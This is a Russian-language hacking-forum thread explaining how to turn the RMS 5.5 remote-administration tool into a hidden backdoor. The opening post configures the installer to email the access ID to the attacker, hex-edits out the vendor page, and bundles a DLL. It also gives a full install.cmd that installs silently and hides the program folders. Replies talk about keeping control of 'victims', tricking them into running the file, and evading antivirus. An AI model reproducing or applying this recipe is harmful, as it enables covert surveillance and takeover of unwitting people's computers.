1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

RMS 5.5 скрытый с отправкой ID на почту

Тема в разделе "РАТ| Бэкдоры | РМС | Даунлоадеры", создана пользователем grs101, 11 сен 2013.

  1. TopicStarter Overlay
    grs101

    grs101

    Регистрация:
    30 сен 2012
    Сообщения:
    286
    Симпатии:
    262
    Скачиваем последнюю версию RMS 5.5 с официального сайта, запускаем вьювер выбираем меню Инструменты, MSI конфигуратор, открываем файл RMS хоста. Выбираем дистрибутив "One Click" отмечаем генерировать новый id при отправке на почту, вводим свое мыло, ставим отключить создание ярлыков, не запрашивать подтверждения и т.д. Нажимаем Конфигурировать, отключаем: оповещение пользователя, иконку в трее, вобщем все по старой схеме.

    Полученный RMS.exe открываем в WinHex и нажимаем ctrl+F, вводим туда эту строчку: RunProgram="forcenowait:Please login or register to view links" и нажимаем поиск, найденную строчку забиваем пробелами, внимательно чтобы не удалить лишние символы.
    Please login or register to view links

    После этого сохраняем RMS.exe. Этими действиями мы убрали открытие сайта rmansys.ru при запуске RMS.exe
    Далее открываем RMS.exe 7-zip ом и добавляем туда файлы: winmm.dll и 28.reg. После этого извлекаем файл install.cmd, открываем его блокнотом и удаляем все, вместо этого копируем туда этот код:


    @chcp 1251
    mkdir "%ProgramFiles%\Remote Manipulator System - Host"
    copy winmm.dll "%ProgramFiles%\Remote Manipulator System - Host" >nul
    @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
    @MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /qn REBOOT=ReallySuppress
    @ping 127.0.0.1
    @MsiExec /I "rms.host5.5ru.msi" /qn
    @ping 127.0.0.1
    regedit /s 28.reg
    @attrib +h +s +r "%programfiles%\Remote Manipulator System - Host"
    @attrib +h +s +r "%ProgramFiles(x86)%\Remote Manipulator System - Host"
    @attrib +h +s +r /d /s "%programfiles%\Remote Manipulator System - Host\*.*"
    @attrib +h +s +r /d /s "%ProgramFiles(x86)%\Remote Manipulator System - Host\*.*"

    Сохраняем новый install.cmd и упаковываем обратно. Все RMS.exe готов

    -полностью скрытый

    -убран баннер о видеонаблюдении

    -отправка id на почту

    -не убиваем в процессах

    -из главных 5-и АВ пока палица только Авирой, она палит winmm.dll (ну и проактивками)

    ЗАПУСКАЕМ НА ВИРТУАЛКЕ
    пароль: IFUD.WS
    Please login or register to view links
     
    • Like Like x 19
    • Dislike Dislike x 1
    Метки:
  2. MaxSAVA

    MaxSAVA Гость

    Да зачем такие хорошие вещи,без хайда класть..,прогорит же.
     
    • Like Like x 1
  3. SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Хайд больше ставь пока палится не начала . :ej
     
    • Like Like x 2
  4. Boomerang1

    Boomerang1

    Регистрация:
    20 апр 2013
    Сообщения:
    42
    Симпатии:
    32
    При повторном запуске готового "rms" жертвой ,теряется контроль над жертвой.Как решить эту проблему?
     
  5. Trench

    Trench

    Регистрация:
    6 апр 2013
    Сообщения:
    27
    Симпатии:
    6
    А он самоудаляется?
     
  6. Boomerang1

    Boomerang1

    Регистрация:
    20 апр 2013
    Сообщения:
    42
    Симпатии:
    32
    Нет
     
  7. TopicStarter Overlay
    grs101

    grs101

    Регистрация:
    30 сен 2012
    Сообщения:
    286
    Симпатии:
    262
    Да тут весь смысл в winmm.dll, эта dll-ка уже давно в паблике по ней изначально палила Avira, так что смысл огромные хайды делать, а сам РМС не будет палица пока 5.6 версия не выйдет, ну по крайней мере с предшествующими так было. Если модераторы или администраторы посчитают нужным то увеличат хайд.
     
  8. Boomerang1

    Boomerang1

    Регистрация:
    20 апр 2013
    Сообщения:
    42
    Симпатии:
    32
    При повторном запуске готового "rms" жертвой ,теряется контроль над жертвой.Как решить эту проблему?
     
  9. TopicStarter Overlay
    grs101

    grs101

    Регистрация:
    30 сен 2012
    Сообщения:
    286
    Симпатии:
    262
    Ну тут батник надо переделывать, чтобы он находил и проверял установлен ли хост или нет. Кому нужно тот под себя переделает. Мне и так нормально, я впариваю под таким предлогом, что жертве уже не нужно запускать его повторно.
     
  10. 3v1L

    3v1L

    Регистрация:
    15 май 2013
    Сообщения:
    92
    Симпатии:
    34
    RMS и так палится многими АВ. И палится как при скрытой установке так и обычная скаченая с офф сатф
     
  11. Boomerang1

    Boomerang1

    Регистрация:
    20 апр 2013
    Сообщения:
    42
    Симпатии:
    32
    Надеюсь ты не на вирустотал сканил. Скан Please login or register to view links
     
  12. 3v1L

    3v1L

    Регистрация:
    15 май 2013
    Сообщения:
    92
    Симпатии:
    34
    Палится при установке !
     
  13. Ph7wD

    Ph7wD Гость

    Имя процесса rfusclient.exe?
     
  14. SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Да чего тут думать написал батник удаление сервака (но в батнике надо впевую очередь убить процесы сервака а то он не утолится )и запускай его в первую очередь ,а потом через секунд 20 запускай свой вирь и все .ВСЕ ЭЛЕМЕНТАРНО.....
     
  15. Ltybcrf

    Ltybcrf Гость

    Поставил 75 хайд. 5+
     
    • Like Like x 3
  16. Palach100

    Palach100

    Регистрация:
    27 авг 2013
    Сообщения:
    308
    Симпатии:
    150
    Тема хорошая, а под хайдом ссылка на сервер чтоле?
     
  17. SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Мне в этой рмске понравилось что нет банера видео наблюдения :)
     
  18. Ph7wD

    Ph7wD Гость

    ну это понятно, одно без другого не бывает, тут тема в другом - как бы это все дело переименовать, ну это же совсем без мозгов надо быть, чтобы такое в процессах не заметить...
     
  19. MaxSAVA

    MaxSAVA Гость

    я как то к парню подключился,он в процессах шарил у него лагало,ну он всякие поудалял и эти 2 даже не тронул...
     
  20. TopicStarter Overlay
    grs101

    grs101

    Регистрация:
    30 сен 2012
    Сообщения:
    286
    Симпатии:
    262
    Они под хайдом
     

Поделиться этой страницей

Загрузка...